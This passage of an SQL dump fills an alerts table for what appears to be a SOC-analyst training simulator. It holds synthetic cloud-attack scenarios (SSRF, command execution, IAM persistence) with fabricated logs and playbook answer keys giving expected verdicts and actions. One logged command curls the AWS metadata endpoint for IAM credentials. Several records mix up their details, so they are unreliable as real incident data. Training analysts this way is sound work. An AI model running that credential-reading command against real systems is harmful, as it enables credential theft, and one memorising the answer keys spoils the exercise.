4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:45:37Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"185.14.89.32\\\",\\\"destination_ip\\\":\\\"192.168.10.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"wiper_destruction.exe\\\",\\\"username\\\":\\\"admin_ukraine\\\",\\\"event_description\\\":\\\"Unauthorized execution of wiper malware on ICS systems detected\\\",\\\"network_protocol\\\":\\\"TCP\\\",\\\"destination_port\\\":445,\\\"action_taken\\\":\\\"Execution blocked\\\",\\\"status\\\":\\\"failed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(871, 'Initial Access via SSRF Vulnerability', 'critical', 'AWS CloudTrail Logs', 'An unauthorized access attempt was detected exploiting a misconfigured AWS WAF through a Server-Side Request Forgery (SSRF) vulnerability. The attacker aimed to access the internal AWS metadata service of Capital One\'s cloud environment.', 'Server-Side Request Forgery', 'T1071.001 - Application Layer Protocol', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"AssumedRole\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\",\"accountId\":\"123456789012\",\"accessKeyId\":\"AKIAIOSFODNN7EXAMPLE\",\"sessionContext\":{\"attributes\":{\"mfaAuthenticated\":\"true\",\"creationDate\":\"2023-10-05T14:48:00Z\"}}},\"eventTime\":\"2023-10-05T14:55:00Z\",\"eventSource\":\"ec2.amazonaws.com\",\"eventName\":\"DescribeInstances\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"198.51.100.23\",\"userAgent\":\"curl/7.64.1\",\"requestParameters\":{\"instanceIds\":[\"i-0abcd1234efgh5678\"]},\"responseElements\":null,\"requestID\":\"c7f9c6e1-1234-5678-9abc-def123456789\",\"eventID\":\"8d7f5b12-1234-5678-9abc-abcdef012345\",\"readOnly\":false,\"resources\":[{\"ARN\":\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\",\"accountId\":\"123456789012\",\"type\":\"AWS::EC2::Instance\"}],\"eventType\":\"AwsApiCall\",\"managementEvent\":true,\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous SSRF attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Role used by EC2 instances in the affected AWS account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.536Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/EC2InstanceRole/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"AKIAIOSFODNN7EXAMPLE\\\",\\\"sessionContext\\\":{\\\"attributes\\\":{\\\"mfaAuthenticated\\\":\\\"true\\\",\\\"creationDate\\\":\\\"2023-10-05T14:48:00Z\\\"}}},\\\"eventTime\\\":\\\"2023-10-05T14:55:00Z\\\",\\\"eventSource\\\":\\\"ec2.amazonaws.com\\\",\\\"eventName\\\":\\\"DescribeInstances\\\",\\\"awsRegion\\\":\\\"us-east-1\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"curl/7.64.1\\\",\\\"requestParameters\\\":{\\\"instanceIds\\\":[\\\"i-0abcd1234efgh5678\\\"]},\\\"responseElements\\\":null,\\\"requestID\\\":\\\"c7f9c6e1-1234-5678-9abc-def123456789\\\",\\\"eventID\\\":\\\"8d7f5b12-1234-5678-9abc-abcdef012345\\\",\\\"readOnly\\\":false,\\\"resources\\\":[{\\\"ARN\\\":\\\"arn:aws:ec2:us-east-1:123456789012:instance/i-0abcd1234efgh5678\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"type\\\":\\\"AWS::EC2::Instance\\\"}],\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(872, 'Execution of Unauthorized Commands', 'high', 'AWS CloudWatch Logs', 'An attacker exploited an SSRF vulnerability to execute unauthorized commands on the server, retrieving sensitive metadata, including IAM role credentials. The commands were executed from an external IP address, potentially indicating a breach.', 'Command Execution', 'T1059.004', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"source_ip\":\"203.0.113.42\",\"destination_ip\":\"10.0.1.15\",\"user\":\"ec2-user\",\"command\":\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\",\"response_code\":200,\"response_size\":512,\"user_agent\":\"curl/7.64.1\",\"session_id\":\"abcd1234efgh5678\",\"malicious_file\":\"ssrf_exploit.exe\",\"malicious_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-15 00:53:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous SSRF attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known SSRF exploit tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.538Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:07Z\\\",\\\"source_ip\\\":\\\"203.0.113.42\\\",\\\"destination_ip\\\":\\\"10.0.1.15\\\",\\\"user\\\":\\\"ec2-user\\\",\\\"command\\\":\\\"curl http://169.254.169.254/latest/meta-data/iam/security-credentials/\\\",\\\"response_code\\\":200,\\\"response_size\\\":512,\\\"user_agent\\\":\\\"curl/7.64.1\\\",\\\"session_id\\\":\\\"abcd1234efgh5678\\\",\\\"malicious_file\\\":\\\"ssrf_exploit.exe\\\",\\\"malicious_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(873, 'Persistence via IAM Role Abuse', 'critical', 'IAM Role Access Logs', 'The attacker leveraged stolen IAM role credentials to establish persistent access without detection. This step involved using the compromised credentials to create a new IAM policy allowing further persistence.', 'Credential Access', 'T1078.004 - Valid Accounts: Cloud Accounts', 1, 'resolved', NULL, '{\"eventVersion\":\"1.08\",\"userIdentity\":{\"type\":\"AssumedRole\",\"principalId\":\"AROAEXAMPLE:attacker-session\",\"arn\":\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\",\"accountId\":\"123456789012\",\"accessKeyId\":\"ASIAEXAMPLE\"},\"eventTime\":\"2023-09-15T14:56:30Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"CreatePolicy\",\"awsRegion\":\"us-west-2\",\"sourceIPAddress\":\"198.51.100.23\",\"userAgent\":\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\",\"requestParameters\":{\"policyName\":\"PersistencePolicy\",\"policyDocument\":{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Action\":\"s3:ListBucket\",\"Resource\":\"arn:aws:s3:::example_bucket\"}]}},\"responseElements\":{\"policy\":{\"policyName\":\"PersistencePolicy\",\"policyId\":\"ANPAEXAMPLE\",\"arn\":\"arn:aws:iam::123456789012:policy/PersistencePolicy\",\"path\":\"/\",\"defaultVersionId\":\"v1\"}},\"requestID\":\"EXAMPLE-1111-2222-3333-4444\",\"eventID\":\"EXAMPLE-5678-9101-1121-3141\",\"readOnly\":false,\"eventType\":\"AwsApiCall\",\"managementEvent\":true,\"recipientAccountId\":\"123456789012\"}', '2026-01-15 00:53:58', '2026-02-16 17:56:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"attacker-session\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Session name used in multiple unauthorized activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"PersistencePolicy\",\"is_critical\":false,\"osint_result\":{\"source\":\"Policy Audit\",\"verdict\":\"suspicious\",\"details\":\"Recently created policy with permissions allowing persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'CLOUD', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 Linux/5.4.0-1029\\\",\\\"requestParameters\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyDocument\\\":{\\\"Version\\\":\\\"2012-10-17\\\",\\\"Statement\\\":[{\\\"Effect\\\":\\\"Allow\\\",\\\"Action\\\":\\\"s3:ListBucket\\\",\\\"Resource\\\":\\\"arn:aws:s3:::example_bucket\\\"}]}},\\\"responseElements\\\":{\\\"policy\\\":{\\\"policyName\\\":\\\"PersistencePolicy\\\",\\\"policyId\\\":\\\"ANPAEXAMPLE\\\",\\\"arn\\\":\\\"arn:aws:iam::123456789012:policy/PersistencePolicy\\\",\\\"path\\\":\\\"/\\\",\\\"defaultVersionId\\\":\\\"v1\\\"}},\\\"requestID\\\":\\\"EXAMPLE-1111-2222-3333-4444\\\",\\\"eventID\\\":\\\"EXAMPLE-5678-9101-1121-3141\\\",\\\"readOnly\\\":false,\\\"eventType\\\":\\\"AwsApiCall\\\",\\\"managementEvent\\\":true,\\\"recipientAccountId\\\":\\\"123456789012\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.540Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"eventVersion\\\":\\\"1.08\\\",\\\"userIdentity\\\":{\\\"type\\\":\\\"AssumedRole\\\",\\\"principalId\\\":\\\"AROAEXAMPLE:attacker-session\\\",\\\"arn\\\":\\\"arn:aws:sts::123456789012:assumed-role/CompromisedRole/attacker-session\\\",\\\"accountId\\\":\\\"123456789012\\\",\\\"accessKeyId\\\":\\\"ASIAEXAMPLE\\\"},\\\"eventTime\\\":\\\"2023-09-15T14:56:30Z\\\",\\\"eventSource\\\":\\\"iam.amazonaws.com\\\",\\\"eventName\\\":\\\"CreatePolicy\\\",\\\"awsRegion\\\":\\\"us-west-2\\\",\\\"sourceIPAddress\\\":\\\"198.51.100.23\\\",\\\"userAgent\\\":\\\"aws-cli/2.0.30 Python/3.7.3 